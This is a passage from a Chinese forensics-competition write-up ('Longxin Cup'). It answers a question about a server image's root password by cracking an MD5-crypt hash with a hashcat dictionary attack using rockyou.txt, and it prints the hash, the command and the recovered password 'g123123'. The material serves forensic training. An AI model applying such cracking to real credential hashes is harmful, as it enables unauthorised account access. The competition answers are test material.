B.Windows 10

C.Windows 11

D.Windows Server 2000

A

这个目录下一堆日志

第一届“龙信杯”电子数据取证竞赛Writeup_第126张图片

不嫌麻烦也没几个就手动翻过去,嫌麻烦就写个bash脚本一次性都解压了 ,然后搜一下

第一届“龙信杯”电子数据取证竞赛Writeup_第127张图片

13.请分析该服务器镜像最高权限“root”账户的密码是_______。(标准格式:a123456)

g123123

hashcat直接爆rockyou,答辩的时候说是非预期hhh,暂未想到什么预期做法

hashcat  -a 0 $1$kmYU/aog$fKIF3ugewwCTuPWOSksjD/ rockyou.txt --force --self-test-disable

第一届“龙信杯”电子数据取证竞赛Writeup_第128张图片

你可能感兴趣的:(python,网络安全,数据分析,开发语言,php)